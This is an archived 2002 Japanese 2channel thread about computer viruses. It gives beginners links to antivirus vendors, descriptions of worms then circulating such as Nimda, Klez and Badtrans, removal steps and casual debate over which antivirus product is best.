5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

コンピュータウィルス総合スレッド VOL.21

1 :ひよこ名無しさん:02/07/01 00:47 ID:B6kpRAqc
■■ウィルス関連の質問・相談はこのスレッドでどうぞ■■

※質問の前に、必ず>>1-16を読んで下さい。

初心者の皆さん、コンピューターウィルス対策は万全ですか?
今こうして2chを見ているということはインターネットを利用しているということ。
だったら「いつ、どこで」ウィルスに感染してしまうかもしれません!

◇インターネット上の怪しいファイルをダウンロードしたり、電子メールで
届いた添付ファイルにはウィルスが混入しているかも...注意しましょう!

★IPAセキュリティセンター:http://www.ipa.go.jp/security/index.html
 など、ウィルス情報を扱っているホームページを見て、ウィルスに関する
 理解を深めるのも良いでしょう。

★コンピュータウイルス110番:IPAセキュリティセンターが設置している
 電話相談です。コンピュータウィルスに関連のあることは何でも相談可です。
 →詳しくはIPAのホームページで

リンクがずれる事があります。
またスレッド作成時との時間差により最新情報と食い違う点もあるかと思います。
あらかじめ、ご了承下さい。

>>2     今すぐウィルススキャンを実行してみよう
>>3     ウィルス定義データは定期的に更新しよう / ワクチンメーカーリンク集
>>4     最近よくみられるウィルスに関して
>>5     ウィルスに感染しないために / ウィルスを発見・感染したら届け出を!
>>6-9   【危険】最新流行中のウィルス!
>>10-14  最近の代表的なウィルスFAQと流行の恐れあるウィルスについて
>>15    メーラー「Becky!」への影響について
>>16    ウィルスの事で悩んでる人へ / 過去ログ コンピュータウィルス総合スレッドVol.1〜19

スレッドを立てる時に邪魔されてるかもしれないので、ズレてるかも。
まとめて全部読む時は>>1-20(←ここをクリック)あたりで読めます。
ミラーサイトはこちら http://pcqa.tripod.co.jp/virus.htm(全部読めます)

2 :ひよこ名無しさん:02/07/01 00:47 ID:B6kpRAqc
■■今すぐウィルススキャンを実行してみよう■■

ウィルスか?と不安がる前に実行してね。

★ウィルス監視ソフトを導入していない人へ

今すぐパソコンショップへ行って買ってきましょう!ウィルスバスター2002や
Norton AntiVirusなら、たいていのお店で売っているはずです。

そして、今すぐ買うお金が無い人や、もう感染してるかもしれないと
思っている人はオンラインスキャンを実行してみましょう!

・トレンドマイクロ/オンラインスキャン
 http://www.trendmicro.co.jp/hcall/scan.htm
オンラインでウィルススキャンが実行できます。ActiveXを利用しますので
設定を確認してください。※ブラウザはInternet Exprolerしか使えません。

・ウイルスバスター2002体験版ダウンロード
 http://www.trendmicro.co.jp/product/vb2002/lis.asp

・シマンテック セキュリティチェック
 http://www.symantec.com/region/jp/securitycheck/index.html
セキュリティ危険度とコンピュータ・ウィルスの検査ができる
オンライン・チェックサイト。

・シマンテック/Norton AntiVirus体験版ダウンロード
 http://www.symantec.com/region/jp/trial/trial.html

★ウィルス監視ソフトを導入してる人へ

導入していたとしても、時々はシステム全体をスキャンしてみましょう。
夜、寝ている間にスキャンさせておくといいですよ。

気が付かないうちに感染していることもあるかもしれません。
定期的にスキャンさせることを心懸けましょう。
もちろんウィルスの定義ファイル更新も忘れないでください。

3 :ひよこ名無しさん:02/07/01 00:47 ID:B6kpRAqc
■■ウィルス定義データは定期的に更新しよう■■

メーカー製パソコンにはウィルス監視ソフトがプリインストール
されていると思います。しかし、それだけでは万全ではありません。

なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。

そのため、ウィルス監視ソフトには「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を
手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ
検出できません。ウィルス監視ソフトを導入しているからと安心せず、
必ず定期的にデータの更新を行ないましょう!

データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■

※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社
 http://www.trendmicro.co.jp/
 製品名:ウイルスバスター2002、Inter Scan

・株式会社シマンテック
 http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonAntiVirus for Mac

・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
 http://www.vintage-solutions.com/indexjpn.html
 製品名:ANTIDOTE (アンチドート)

・株式会社アラジンジャパン
 http://www.aladdin.co.jp
 製品名:eSafeProtect

・コンピュータアソシエイツ株式会社
 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus

・日本ネットワークアソシエイツ株式会社
 http://www.nai.com/japan/
 製品名:McAfee VirusScan 、GroupShield

※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
  http://www.nai.com/japan/download/dat3end.asp
  該当する場合は諦めてノートンかウィルスバスターを買いましょう。

※McAfee VirusScanはWindowsシステムに悪影響を及ぼすことが
  あるため、当スレッドでは使用中止を推奨しています。

4 :ひよこ名無しさん:02/07/01 00:48 ID:B6kpRAqc
■■最近よくみられるウィルスに関して■■

怪しい添付ファイルは絶対に実行(ダブルクリック)せずに、速やかに削除を。

★W32/Sircamに関する情報@IPAセキュリティセンター
 http://www.ipa.go.jp/security/topics/sircam.html
 Hi! How are you?で始まる英文(スペイン語の場合もあり)メールに
 添付ファイルがついていたら、サーカムの可能性が高いです。

★Code Redに関する情報@Microsoft
 http://www.microsoft.com/japan/technet/security/codeptch.asp
 Webサーバへ攻撃を仕掛けてくるワームです。Windows2000の人はパッチをあてよう。

★W32/Hybrisに関する情報@IPAセキュリティセンター
 http://www.ipa.go.jp/security/topics/hybris.html
 差出人、件名が「空白」のメールで「意味不明な8文字のアルファベット.exe」という
 添付ファイルが届いた場合、W32/Hybrisウィルスの可能性が非常に高いです。
 ※Hybrisのファイル名はランダム8文字.exeですが、この8文字部分の
 先頭2文字と末尾2文字は同じ文字です(例:AB****AB.EXEやXZ****XZ.EXE)。
 ※海外から届いた場合、差出人は「Hahaha」になります

★W32/MTXに関する情報@IPAセキュリティセンター
 http://www.ipa.go.jp/security/topics/mtx.html
 拡張子がPIF、またはSCRという添付ファイルには要注意!
 リンク先から添付ファイル名リストを参照できます。
 注)http://dns1.jcsa.or.jp/download/unmtxx.htmlに駆除用の
 ツールがありますが、駆除出来ない亜種も発見されています。

※これら以外にも、大変多くのウィルスが存在しています。感染しないように
  注意すると共に、ウィルス監視ソフトなどで常にガードしておくことが重要です。

5 :ひよこ名無しさん:02/07/01 00:48 ID:B6kpRAqc
■■ウィルスに感染しないために■■

★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、
  あなたの負担もグッと減ります。

★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。

★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。

★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので
  注意が必要です。

★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。

■■ウィルスを発見・感染したら届け出を! ■■

もしウィルスを発見したり、感染してしまったら届け出をしましょう!

★IPAセキュリティセンター
 コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html

こちらに届け出の方法などが記載されています。E-mail・郵送・FAXが
利用できますので、ぜひ届け出ましょう。

※IPAセキュリティセンターのコメント(転載)
 届出は、感染被害の拡大と再発防止のための大変貴重な資料となります。
 記載されているプライバシーに関する情報を公表することはありませんので、
 届出へのご協力をお願いいたします。

6 :ひよこ名無しさん:02/07/01 00:49 ID:B6kpRAqc
【危険】最新流行中のウィルス!その1

■■BADTRANS.Bに注意を!!■■

昨年末より「BADTRANS.B」が猛威を奮っています。
このウィルスはInternet Explorerのセキュリティホールを悪用しており、
OutlookやOutlook Expressでメールを開いたりプレビューさせたただけで
自動的に実行され、感染する可能性があります。

●予防策
 ★ブラウザ(Internet Explorer)にパッチを適用する。
  Internet Explorer 5.01の場合、SP2 を適用する。
  ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
  Internet Explorer 5.5 の場合、SP2 を適用する。
  あるいは最新の Internet Explorer 6.0 をインストールする。
  (注:必ず、Outlook Expressを含む標準構成以上で)

●説明
 このウィルスに感染すると、受信トレイの未読メールに返信する形で自分自身を
 添付してメールを送信したり、Temporary Internet Filesなどにある.asp、.htm、
 .htmlファイルなどからメールアドレスを取得し、自身を添付してメールを送信します。
 ウィルス自身に送信機能があるため、メーラーの送信履歴などには残りません。
 また同時にキーボード操作を記録するプログラムを投入して、ウィルス作者に
 パスワード等の操作記録を送信しようとします。

●駆除と修復
 感染してしまった場合、最新のウィルス定義ファイルでスキャンして
 検出されたファイルを削除し、レジストリ等を修正する必要があります。
 ワクチンベンダーから配布されている無償の駆除ツールを使う場合は
 自己責任で利用してください。

●関連サイト
 http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
 http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM%5FBADTRANS%2EB
 http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
 http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Badtrans@MM

(駆除ツール)
 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
 http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b@mm.removal.tool.html

(2ch関連スレ)
 http://pc.2ch.net/test/read.cgi/sec/1008355163/

7 : :02/07/01 00:51 ID:???
【危険】最新流行中のウィルス!その2

■■whatever.exeが届いたら要注意!■■

W32/Alizウイルスが世界的規模で急激に勢いを増しています。
このウイルスは、InternetExplorerのセキュリティホールを悪用しているため、
Outlookではメールを開いただけで、OutlookExpressではプレビューしただけで
感染します。

ウイルス定義ファイルを更新し、最新ウイルスに備えておくとともに、
InternetExplorer、Outlook/OutlookExpressのセキュリティホールを
潰す必要があります。

●予防策
 ★ブラウザ(InternetExplorer)にパッチを適用する
  InternetExplorer 5.01の場合、SP2を適用する。
  ※ 但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
  InternetExplorer 5.5の場合、SP2を適用する。
  あるいは最新の InternetExplorer 6.0 をインストールする。
  (注:必ず、Outlook Expressを含む標準構成以上で)

●説明
 W32/Alizウイルスは、Windows系OSで動作するとOutlookExpressのアドレス帳に
 登録されている全てのアドレス宛にウイルスを添付したメールを送信します。
 送信されるメールの内容は次のとおりです。


8 : :02/07/01 00:52 ID:???
【危険】最新流行中のウィルス!その3

■■新種ウイルス「W32/Klez」に注意を!■■

W32/Klezウイルスは、InternetExplorerの既知のセキュリティホールを
悪用したウイルスで、メールの添付ファイルを介して感染を拡げます。
このウイルスが添付されたメールを受け取ると、Outlookでは
メールを開いただけで、OutlookExpressではプレビューしただけで感染します。

●予防策
 ★ブラウザ(InternetExplorer)にパッチを適用する。
  InternetExplorer 5.01の場合、SP2 を適用する。
  ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
  InternetExplorer 5.5 の場合、SP2 を適用する。
  あるいは最新の InternetExplorer 6.0 をインストールする。
  (注:必ず、Outlook Expressを含む標準構成以上で)

●説明
 このウイルスに感染すると、Outlookのアドレス帳に登録されている
 全てのアドレス宛にウイルスを添付したメールを送信します。
 送信者のアドレス欄には、ウイルスが作成した架空のアドレスが
 記載されます。送信されるメールの内容は次のとおりです。

 ・件名:Hi 他
 ・本文:I'm sorry to do so,but it's helpless to say sorry.
      I want a good job,I must support my parents.

9 : :02/07/01 00:52 ID:???
【危険】最新流行中のウィルス!その4

■■W32/Nimdaとその亜種にご注意!!■■

このウイルスは、セキュリティホールを悪用したウイルスで、
ホームページを見るだけでウイルスに感染することがあります。

亜種は最近登場しているので、登場後にウイルスチェッカーの
定義ファイルを更新していない場合、ウイルススキャンで検出出来ません。
最新の定義ファイルに更新しましょう。

●予防策

 ★ブラウザ(InternetExplorer)にパッチを適用する
  InternetExplorer 5.01の場合、SP2 を適用する。
  ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
  InternetExplorer 5.5 の場合、SP2 を適用する。
  あるいは最新の InternetExplorer 6.0 をインストールする。
  (注:必ず、Outlook Expressを含む標準構成以上で)

●下記サイトにも情報が掲載されているので、参照して下さい。
W32/Nimda
 http://www.ipa.go.jp/security/topics/newvirus/nimda.html
 http://www.symantec.co.jp/region/jp/sarcj/nimda.html
 http://www.trendmicro.co.jp/nimda/

10 : :02/07/01 00:52 ID:???
■■WORM_GONE.A■■

トロイの木馬型(ワーム)、WORM_GONE.Aは2001年12月4日に発見された
ばかりの新しいウィルスです。

<<感染ルート>>
 メール、ICQから感染します。

<<感染するとどうなるのか>>
 ・ウィルス監視ソフトやファイヤーウォールを削除してしまいます。
 ・大量のメールを勝手に送信して感染を広げようとします。
 ・ICQをインストールしている場合、ICQでも感染を広げようとします。
 ・mIRCというソフトをインストールしている場合、これを利用してDDoS攻撃を行います。

<<詳細情報>>
 http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM_GONE.A
 http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.goner.a%40mm.html

<<駆除ツール>>
 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3388
 http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.goner.a%40mm.removal.tool.html

11 : :02/07/01 00:53 ID:???
■■W32/Myparty■■

W32/MypartyはYahoo!からのメールを装って感染するウィルスです。

<<感染ルート>>
 メールに添付されたファイルを実行することで発病します。
 添付ファイル名はwww.myparty.yahoo.comまたはmyparty.photos.yahoo.comになります。

<<感染するとどうなるのか>>
 ・大量のメールを勝手に送信して感染を広げようとします。
 ・システム起動時にトロイの木馬が実行されるようシステムを改変します。
 ・特定のURL(既に消滅)にアクセスしようとします。

<<詳細情報>>
 http://www.ipa.go.jp/security/topics/newvirus/myparty.html
 http://www.trendmicro.co.jp/virusinfo/worm_myparty_a.htm
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.B
 http://www.symantec.com/region/jp/sarcj/data/w/w32.myparty%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.myparty.b%40mm.html
 ※2種類の亜種が確認されています。

<<駆除ツール>>
 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3619
 ※2種類の亜種のうちMYPARTY.A用の駆除ツールです。自己責任でどうぞ。

12 : :02/07/01 00:53 ID:???
■■ウイルス『Badtrans.B』FAQ■■

Q1:ウィルス付きメールを開いただけで感染しますか?
A1:メールソフトにOutlook ExpressまたはOutlookを利用し、
   かつInternet ExplorerがSP2でない場合は、メールを見るだけで感染します。
   Internet Explorerのバージョンはヘルプ>バージョン情報で確認
   下記ページにてbuild番号とバージョンを確認
   http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm#ieoeversion

Q2:SP2はどこからDL出来ますか?
A2:Windows Update、及び下記のサイトから
   http://www.microsoft.com/windows/ie_intl/ja/download/
   回線に種類にもよりますが、DLにはかなりの時間を要します。

Q3:IE5.01SP2と5.5SP2のどちらが良いですか?
A3:5.01SP2はサポートが打ち切られているので、5.5SP2、または 6
  (標準構成以上) がよろしいかと思います。

Q4:SP2を導入したらウィルスには感染しませんか?
A4:メールを見ただけでの感染は防げます。メールに添付されたファイルを
   開いた(実行した)場合は感染します。

Q5:メールソフトにOutlook Expressを使用して無い場合は、感染しませんか?
A5:メールを見るだけでは感染しませんが、ウィルス付ファイルを実行したら
   感染します。

13 :ひよこ名無しさん:02/07/01 00:54 ID:???
■■『MADOKA』・『OZAWA』について■■

これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断
されていましたが、実際にはトロイ活動は無いジョークだということに
なっています。

最近、2ch内で直リンされることが多く、かなりの感染者が出ています。

<<感染ルート>>
 madoka.zipなどをダウンロードし、解凍・実行することで感染します

<<感染するとどうなるのか>>
 ・突然、女性の顔写真が画面いっぱいに表示されます。
 ・システム起動時にこのプログラムが実行されるようシステムを改変します。

<<詳細情報>>
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

<<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
  ozawa.exe、ozawa.logを検索し削除
  (madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
 いるところの ozawa.exe の部分を消去し上書き保存
 (Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
  win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了

14 :ひよこ名無しさん:02/07/01 00:54 ID:???
■■ウイルス『Nimda』FAQ■■

Q1:Webを閲覧しただけで感染しますか?
A1:Internet Explorerのバージョンによります。
   5.0及び5.5の場合はSP2(サービスパック2)をインストールして下さい。
  ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
   Internet Explorerのバージョンはヘルプ>バージョン情報で確認
   下記ページにてbuild番号とバージョンを確認
  http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm#ieoeversion

Q2:SP2はどこからDL出来ますか?
A2:Windows Update、及び下記のサイトから
   http://www.microsoft.com/windows/ie_intl/ja/download/
   回線に種類にもよりますが、DLにはかなりの時間を要します。

Q3:IE5.01SP2と5.5SP2のどちらが良いですか?
A3:Win98ならば5.01SP2、WinMeなら5.5SP2がよろしいかと思います。
   ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨

Q4:SP2を導入したらウィルスには感染しませんか?
A4:Webを見ただけでの感染は防げます。メールに添付されたファイルや
   DLしたファイルを開いた場合は感染します。

Q5:感染の有無はどうしたら分りますか?
A5:『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
   *.emlが大量にHITした際は確定。

Q6:感染した場合、どのような症状がでますか?
A6:ウイルス付メールの自動送信やCドライブをネットワーク共有にしてしまいます。
   詳しくは下記のサイトで確認してください。
  http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
  http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

Q7:ウィルス付きメールを開いただけで感染しますか?
A7:メールソフトにOutlook ExpressまたはOutlookを利用し、
   かつInternet ExplorerがSP2でない場合は、メールを見るだけで感染します。

Q8:メールソフトにOutlook Expressを使用して無い場合は、感染しませんか?
A8:メールを見るだけでは感染しませんが、ウィルス付ファイルを実行したら
   感染します。

Q9:感染した場合はどうすれば良いですか?
A9:インターネットへの接続を控えて、検索でヒットした『readme.exe』『MEP51B3.TMP.EXE』を
   削除してください。ワクチンソフトを所持していない場合は、
   速やかにお店にダッシュして、購入してきてださい。
   ワクチンソフトのウィルス定義ファイルを最新のものに更新、
   ウィルススキャンをしてください。

15 : :02/07/01 00:54 ID:???
■■『MADOKA』・『OZAWA』について■■

これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断
されていましたが、実際にはトロイ活動は無いジョークだということに
なっています。

最近、2ch内で直リンされることが多く、かなりの感染者が出ています。

<<感染ルート>>
 madoka.zipなどをダウンロードし、解凍・実行することで感染します

<<感染するとどうなるのか>>
 ・突然、女性の顔写真が画面いっぱいに表示されます。
 ・システム起動時にこのプログラムが実行されるようシステムを改変します。

<<詳細情報>>
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

<<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
  ozawa.exe、ozawa.logを検索し削除
  (madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
 いるところの ozawa.exe の部分を消去し上書き保存
 (Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
  win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了

16 :ひよこ名無しさん:02/07/01 00:54 ID:???
■■Becky!への影響について■■

もちろんOutlookExpressじゃなくてもHTMLメールが開けるなら注意。
Becky!についてもリムアーツのページに警告が乗ってたので転載。

【2001/11/26 PCウイルス「Aliz」「Badtrans」等のBecky!への影響について。】
これらのウイルスはインターネットエクスプローラのセキュリティホールを突くもので、
その意味ではNimdaと同質のものです。IEのセキュリティアップデートは、
必ず実行しておいて下さい。
また、「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」の
チェックをはずしていれば、HTMLのメールが添付として扱われますので、
それをダブルクリックしない限り感染することはありません。
不安な方は、このオプションをOFFにして置かれることをお勧めします。

※ウイルス対策ソフトが他のメールも含めて受信箱のメールを削除してしまうという
 トラブルに対処するため、急遽、2.00.08が公開されています。

17 :ひよこ名無しさん:02/07/01 00:55 ID:???
■■過去ログ■■
VOL1  http://natto.2ch.net/pcqa/kako/987/987063100.html
VOL2  http://natto.2ch.net/pcqa/kako/992/992241089.html
VOL3  http://natto.2ch.net/pcqa/kako/997/997485641.html
VOL4  http://natto.2ch.net/pcqa/kako/1000/10008/1000881294.html
VOL5  http://natto.2ch.net/pcqa/kako/1001/10012/1001242103.html
VOL6  http://pc.2ch.net/pcqa/kako/1005/10057/1005771153.html
VOL7  http://pc.2ch.net/pcqa/kako/1006/10068/1006818033.html
VOL8  http://pc.2ch.net/pcqa/kako/1007/10071/1007142533.html
VOL9  http://pc.2ch.net/pcqa/kako/1007/10076/1007658885.html
VOL10 http://pc.2ch.net/pcqa/kako/1008/10088/1008862704.html
VOL11 http://pc.2ch.net/pcqa/kako/1010/10105/1010511938.html
VOL12 http://pc.2ch.net/pcqa/kako/1011/10119/1011948828.html
VOL13 http://pc.2ch.net/pcqa/kako/1012/10129/1012945529.html
VOL14 http://pc.2ch.net/pcqa/kako/1014/10144/1014418017.html
VOL15 http://pc.2ch.net/pcqa/kako/1015/10157/1015798305.html
VOL16 http://pc.2ch.net/pcqa/kako/1017/10177/1017727636.html
VOL17 http://pc.2ch.net/test/read.cgi/pcqa/1019273687/
VOL18 http://pc.2ch.net/test/read.cgi/pcqa/1020583752/
VOL19 http://pc.2ch.net/test/read.cgi/pcqa/1021932401/
VOL20 http://pc.2ch.net/test/read.cgi/pcqa/1023569198/

18 : :02/07/01 00:58 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

19 :ひよこ名無しさん:02/07/01 00:59 ID:???
お疲れ。途中で止まってたから規制に会ってんだろうと思って13〜投稿したらかぶったよ。

20 :ひよこ名無しさん:02/07/01 01:04 ID:???
じっと待つのが(・∀・)イイ!

ともかくお疲れ

21 : :02/07/01 01:08 ID:B6kpRAqc
>>19
もたついて申し訳無いでつ。

因みに前スレの950なんですけどあの流れだと立てちゃ不味かったですか。

22 :ひよこ名無しさん:02/07/01 01:10 ID:???
このスレ、テンプレが多すぎる・・・

23 :ひよこ名無しさん:02/07/01 01:11 ID:???
>>21
(・∀・)イイ! 乙カレー

24 :19:02/07/01 01:12 ID:???
>>21
全然まずくないよー。でも連続投稿で規制に遭うの知ってたから一人でやっても
上手くいかないだろうと思っちゃって。(前スレ二人掛かりで立ててんのを傍観してた)
邪魔してスマソ。

25 :ひよこ名無しさん:02/07/01 01:19 ID:???
このスレも初代からしばらくは>>1-7で済んでたんだけどなー

26 :ひよこ名無しさん:02/07/01 01:21 ID:???
スレ立て、もつかれさま!

27 :ひよこ名無しさん:02/07/01 01:45 ID:5F87GT+j
へんな添付ファイルがついたメールが大量にきます。
勝手に画像ファイルが開いて「この画像は表示できません」というメッセージ。
なんのウイルスでしょうか?

28 :ひよこ名無しさん:02/07/01 01:48 ID:???
>>27
ウイルシ対策ソフトは使ってるのか?

29 :ひよこ名無しさん:02/07/01 01:48 ID:???
>>27
ウィルスチェックすれ
プレビュー切れ

30 :ひよこ名無しさん:02/07/01 01:49 ID:???
>>27
画像のふりしたウイルスじゃねえの?
ウイルス対策ソフト入れてない人は質問しないでね

31 :ひよこ名無しさん:02/07/01 01:50 ID:5F87GT+j
削除したからかウイルススキャンには引っかからなかった。
参加しているMLから大量に来るんだけど
そこでウイルスメールがでまわってますと言っていたから。

32 :ひよこ名無しさん:02/07/01 01:52 ID:???
>>31
んじゃ、いいんじゃねぇの?

33 :ひよこ名無しさん:02/07/01 06:39 ID:???
マカフィー、ノートン、ウイルスバスター
結局どれがベストなの??

34 :Hannibal ◆I3SznmHM :02/07/01 08:18 ID:???
一応、Norton Anti Virus2002がBest。
BetterがVirusBuster2002。
マの字は糞以下と言うことにこの板的にはなっていますな。

35 :ひよこ名無しさん:02/07/01 08:36 ID:???
>>33
マならAVG

36 :定説:02/07/01 10:15 ID:???
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊

37 :ウイルス警備隊:02/07/01 10:39 ID:???
ってどうなの?

38 :ひよこ名無しさん:02/07/01 12:33 ID:???
何でそんなにマカフィーはダメなのレスか??

39 :ひよこ名無しさん:02/07/01 12:36 ID:???
でもバカフィーってシェア世界一なんでしょ?
ダメなのに皆使ってんの??

40 :ひよこ名無しさん:02/07/01 12:37 ID:???
>>38
マカヒーを入れると、いろいろな障害がおきるから。

41 :ひよこ名無しさん:02/07/01 12:37 ID:???
マカフィーはクソ!!

42 :ひよこ名無しさん:02/07/01 12:38 ID:???
>>39
バカフィーはパソコンを買うとプリインストールされていることが多いから、
確かに出荷数はNo1かもしれないがな。

43 :ひよこ名無しさん:02/07/01 12:44 ID:???
確かにオレも、プリインされてたマカフィーの定義ファイルを更新したら、
エラーが起きるようになったな。
まあ、プリインされてた奴だから、と思ってあきらめたんだが、
こういう障害は日常茶飯事なのですか?バカフィーでは。

44 :ひよこ名無しさん:02/07/01 13:02 ID:???
マカヒーによるトラブル例

Outlook Express 終了時に、MSIMN のページ違反が発生します
  ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#193
Windows Me で復元ポイントが作成されません
  ttp://homepage2.nifty.com/winfaq/wme/pchealth.html#634
McAfee 製品の影響で、Outlook Express に不具合が発生することがあります
  ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#635
Internet Explorer の「履歴」が表示されません
  ttp://homepage2.nifty.com/winfaq/c/trouble.html#687
Outlook Express の起動にとても時間がかかるのですが
  ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#388


45 :ひよこ名無しさん:02/07/01 17:05 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
